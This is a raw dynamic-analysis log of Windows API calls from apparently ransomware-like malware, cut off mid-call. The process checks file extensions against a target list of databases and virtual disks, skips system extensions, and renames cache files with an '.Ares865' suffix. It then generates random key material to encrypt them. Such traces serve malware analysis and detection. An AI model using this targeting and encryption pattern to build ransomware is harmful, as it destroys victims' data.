[0110.574] lstrlenW (lpString="tgz") returned 3 [0110.575] lstrcmpiW (lpString1="015", lpString2="tgz") returned -1 [0110.575] lstrlenW (lpString="vbox") returned 4 [0110.575] lstrcmpiW (lpString1="2015", lpString2="vbox") returned -1 [0110.575] lstrlenW (lpString="vdi") returned 3 [0110.575] lstrcmpiW (lpString1="015", lpString2="vdi") returned -1 [0110.575] lstrlenW (lpString="vhd") returned 3 [0110.575] lstrcmpiW (lpString1="015", lpString2="vhd") returned -1 [0110.575] lstrlenW (lpString="vhdx") returned 4 [0110.575] lstrcmpiW (lpString1="2015", lpString2="vhdx") returned -1 [0110.575] lstrlenW (lpString="avhd") returned 4 [0110.575] lstrcmpiW (lpString1="2015", lpString2="avhd") returned -1 [0110.575] lstrlenW (lpString="db") returned 2 [0110.575] lstrcmpiW (lpString1="15", lpString2="db") returned -1 [0110.575] lstrlenW (lpString="db2") returned 3 [0110.575] lstrcmpiW (lpString1="015", lpString2="db2") returned -1 [0110.575] lstrlenW (lpString="db3") returned 3 [0110.575] lstrcmpiW (lpString1="015", lpString2="db3") returned -1 [0110.575] lstrlenW (lpString="dbf") returned 3 [0110.575] lstrcmpiW (lpString1="015", lpString2="dbf") returned -1 [0110.575] lstrlenW (lpString="mdf") returned 3 [0110.575] lstrcmpiW (lpString1="015", lpString2="mdf") returned -1 [0110.575] lstrlenW (lpString="mdb") returned 3 [0110.575] lstrcmpiW (lpString1="015", lpString2="mdb") returned -1 [0110.575] lstrlenW (lpString="sql") returned 3 [0110.575] lstrcmpiW (lpString1="015", lpString2="sql") returned -1 [0110.575] lstrlenW (lpString="sqlite") returned 6 [0110.575] lstrcmpiW (lpString1="B92015", lpString2="sqlite") returned -1 [0110.575] lstrlenW (lpString="sqlite3") returned 7 [0110.575] lstrcmpiW (lpString1="EB92015", lpString2="sqlite3") returned -1 [0110.575] lstrlenW (lpString="sqlitedb") returned 8 [0110.575] lstrcmpiW (lpString1="6EB92015", lpString2="sqlitedb") returned -1 [0110.575] lstrlenW (lpString="xml") returned 3 [0110.575] lstrcmpiW (lpString1="015", lpString2="xml") returned -1 [0110.575] lstrlenW (lpString="$er") returned 3 [0110.575] lstrcmpiW (lpString1="015", lpString2="$er") returned 1 [0110.576] lstrlenW (lpString="4dd") returned 3 [0110.576] lstrcmpiW (lpString1="015", lpString2="4dd") returned -1 [0110.576] lstrlenW (lpString="4dl") returned 3 [0110.576] lstrcmpiW (lpString1="015", lpString2="4dl") returned -1 [0110.576] lstrlenW (lpString="^^^") returned 3 [0110.576] lstrcmpiW (lpString1="015", lpString2="^^^") returned 1 [0110.576] lstrlenW (lpString="abs") returned 3 [0110.576] lstrcmpiW (lpString1="015", lpString2="abs") returned -1 [0110.576] lstrlenW (lpString="abx") returned 3 [0110.576] lstrcmpiW (lpString1="015", lpString2="abx") returned -1 [0110.576] lstrlenW (lpString="accdb") returned 5 [0110.576] lstrcmpiW (lpString1="92015", lpString2="accdb") returned -1 [0110.576] lstrlenW (lpString="accdc") returned 5 [0110.576] lstrcmpiW (lpString1="92015", lpString2="accdc") returned -1 [0110.576] lstrlenW (lpString="accde") returned 5 [0110.576] lstrcmpiW (lpString1="92015", lpString2="accde") returned -1 [0110.576] lstrlenW (lpString="accdr") returned 5 [0110.576] lstrcmpiW (lpString1="92015", lpString2="accdr") returned -1 [0110.576] lstrlenW (lpString="accdt") returned 5 [0110.576] lstrcmpiW (lpString1="92015", lpString2="accdt") returned -1 [0110.576] lstrlenW (lpString="accdw") returned 5 [0110.576] lstrcmpiW (lpString1="92015", lpString2="accdw") returned -1 [0110.576] lstrlenW (lpString="accft") returned 5 [0110.576] lstrcmpiW (lpString1="92015", lpString2="accft") returned -1 [0110.576] lstrlenW (lpString="adb") returned 3 [0110.576] lstrcmpiW (lpString1="015", lpString2="adb") returned -1 [0110.576] lstrlenW (lpString="adb") returned 3 [0110.576] lstrcmpiW (lpString1="015", lpString2="adb") returned -1 [0110.576] lstrlenW (lpString="ade") returned 3 [0110.576] lstrcmpiW (lpString1="015", lpString2="ade") returned -1 [0110.576] lstrlenW (lpString="adf") returned 3 [0110.576] lstrcmpiW (lpString1="015", lpString2="adf") returned -1 [0110.576] lstrlenW (lpString="adn") returned 3 [0110.576] lstrcmpiW (lpString1="015", lpString2="adn") returned -1 [0110.577] lstrlenW (lpString="adp") returned 3 [0110.577] lstrcmpiW (lpString1="015", lpString2="adp") returned -1 [0110.577] lstrlenW (lpString="alf") returned 3 [0110.577] lstrcmpiW (lpString1="015", lpString2="alf") returned -1 [0110.577] lstrlenW (lpString="ask") returned 3 [0110.577] lstrcmpiW (lpString1="015", lpString2="ask") returned -1 [0110.577] lstrlenW (lpString="btr") returned 3 [0110.577] lstrcmpiW (lpString1="015", lpString2="btr") returned -1 [0110.577] lstrlenW (lpString="cat") returned 3 [0110.577] lstrcmpiW (lpString1="015", lpString2="cat") returned -1 [0110.577] lstrlenW (lpString="cdb") returned 3 [0110.577] lstrcmpiW (lpString1="015", lpString2="cdb") returned -1 [0110.577] lstrlenW (lpString="ckp") returned 3 [0110.577] lstrcmpiW (lpString1="015", lpString2="ckp") returned -1 [0110.577] lstrlenW (lpString="cma") returned 3 [0110.577] lstrcmpiW (lpString1="015", lpString2="cma") returned -1 [0110.577] lstrlenW (lpString="cpd") returned 3 [0110.577] lstrcmpiW (lpString1="015", lpString2="cpd") returned -1 [0110.577] lstrlenW (lpString="dacpac") returned 6 [0110.577] lstrcmpiW (lpString1="B92015", lpString2="dacpac") returned -1 [0110.577] lstrlenW (lpString="dad") returned 3 [0110.577] lstrcmpiW (lpString1="015", lpString2="dad") returned -1 [0110.577] lstrlenW (lpString="dadiagrams") returned 10 [0110.577] lstrcmpiW (lpString1="8A6EB92015", lpString2="dadiagrams") returned -1 [0110.577] lstrlenW (lpString="daschema") returned 8 [0110.577] lstrcmpiW (lpString1="6EB92015", lpString2="daschema") returned -1 [0110.577] lstrlenW (lpString="db-journal") returned 10 [0110.577] lstrcmpiW (lpString1="8A6EB92015", lpString2="db-journal") returned -1 [0110.577] lstrlenW (lpString="db-shm") returned 6 [0110.577] lstrcmpiW (lpString1="B92015", lpString2="db-shm") returned -1 [0110.577] lstrlenW (lpString="db-wal") returned 6 [0110.577] lstrcmpiW (lpString1="B92015", lpString2="db-wal") returned -1 [0110.577] lstrlenW (lpString="dbc") returned 3 [0110.577] lstrcmpiW (lpString1="015", lpString2="dbc") returned -1 [0110.578] lstrlenW (lpString="dbs") returned 3 [0110.578] lstrcmpiW (lpString1="015", lpString2="dbs") returned -1 [0110.578] lstrlenW (lpString="dbt") returned 3 [0110.578] lstrcmpiW (lpString1="015", lpString2="dbt") returned -1 [0110.578] lstrlenW (lpString="dbv") returned 3 [0110.578] lstrcmpiW (lpString1="015", lpString2="dbv") returned -1 [0110.578] lstrlenW (lpString="dbx") returned 3 [0110.578] lstrcmpiW (lpString1="015", lpString2="dbx") returned -1 [0110.578] lstrlenW (lpString="dcb") returned 3 [0110.578] lstrcmpiW (lpString1="015", lpString2="dcb") returned -1 [0110.578] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.Ares865") returned 122 [0110.578] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015.ares865"), dwFlags=0x1) returned 1 [0110.581] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.581] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=53978) returned 1 [0110.581] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.581] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.581] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.581] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.582] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.582] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.586] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.587] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.587] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.588] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" | out: lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" [0110.588] lstrlenW (lpString="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 65 [0110.588] lstrlenW (lpString="Ares865") returned 7 [0110.589] lstrcmpiW (lpString1="01A04F9", lpString2="Ares865") returned -1 [0110.589] lstrlenW (lpString=".dll") returned 4 [0110.589] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2=".dll") returned 1 [0110.589] lstrlenW (lpString=".lnk") returned 4 [0110.589] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2=".lnk") returned 1 [0110.589] lstrlenW (lpString=".ini") returned 4 [0110.589] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2=".ini") returned 1 [0110.589] lstrlenW (lpString=".sys") returned 4 [0110.589] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2=".sys") returned 1 [0110.589] lstrlenW (lpString="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 65 [0110.589] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.Ares865") returned 155 [0110.589] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9.ares865"), dwFlags=0x1) returned 1 [0110.591] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.591] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1504) returned 1 [0110.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.591] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.592] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.592] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.595] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.595] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.595] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.596] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" | out: lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" [0110.596] lstrlenW (lpString="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 65 [0110.596] lstrlenW (lpString="Ares865") returned 7 [0110.596] lstrcmpiW (lpString1="F0436E6", lpString2="Ares865") returned 1 [0110.596] lstrlenW (lpString=".dll") returned 4 [0110.596] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2=".dll") returned 1 [0110.596] lstrlenW (lpString=".lnk") returned 4 [0110.596] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2=".lnk") returned 1 [0110.596] lstrlenW (lpString=".ini") returned 4 [0110.596] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2=".ini") returned 1 [0110.596] lstrlenW (lpString=".sys") returned 4 [0110.596] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2=".sys") returned 1 [0110.596] lstrlenW (lpString="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 65 [0110.597] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.Ares865") returned 155 [0110.597] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6.ares865"), dwFlags=0x1) returned 1 [0110.598] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.599] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1451) returned 1 [0110.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.599] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.600] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.600] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.603] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.603] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.603] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.604] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" | out: lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" [0110.604] lstrlenW (lpString="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 65 [0110.604] lstrlenW (lpString="Ares865") returned 7 [0110.604] lstrcmpiW (lpString1="203A31E", lpString2="Ares865") returned -1 [0110.604] lstrlenW (lpString=".dll") returned 4 [0110.604] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2=".dll") returned 1 [0110.604] lstrlenW (lpString=".lnk") returned 4 [0110.604] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2=".lnk") returned 1 [0110.604] lstrlenW (lpString=".ini") returned 4 [0110.604] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2=".ini") returned 1 [0110.604] lstrlenW (lpString=".sys") returned 4 [0110.604] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpString2=".sys") returned 1 [0110.604] lstrlenW (lpString="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 65 [0110.605] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.Ares865") returned 155 [0110.605] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e.ares865"), dwFlags=0x1) returned 1 [0110.606] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.606] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1618) returned 1 [0110.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.607] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.607] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.607] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.611] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.612] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.612] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.612] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" | out: lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" [0110.612] lstrlenW (lpString="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 65 [0110.612] lstrlenW (lpString="Ares865") returned 7 [0110.612] lstrcmpiW (lpString1="D10F061", lpString2="Ares865") returned 1 [0110.612] lstrlenW (lpString=".dll") returned 4 [0110.612] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2=".dll") returned 1 [0110.612] lstrlenW (lpString=".lnk") returned 4 [0110.612] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2=".lnk") returned 1 [0110.612] lstrlenW (lpString=".ini") returned 4 [0110.612] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2=".ini") returned 1 [0110.612] lstrlenW (lpString=".sys") returned 4 [0110.612] lstrcmpiW (lpString1="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", lpString2=".sys") returned 1 [0110.613] lstrlenW (lpString="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned 65 [0110.613] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.Ares865") returned 155 [0110.613] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061.ares865"), dwFlags=0x1) returned 1 [0110.615] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.615] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1618) returned 1 [0110.615] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.615] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.615] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.615] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.616] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.616] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.618] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) 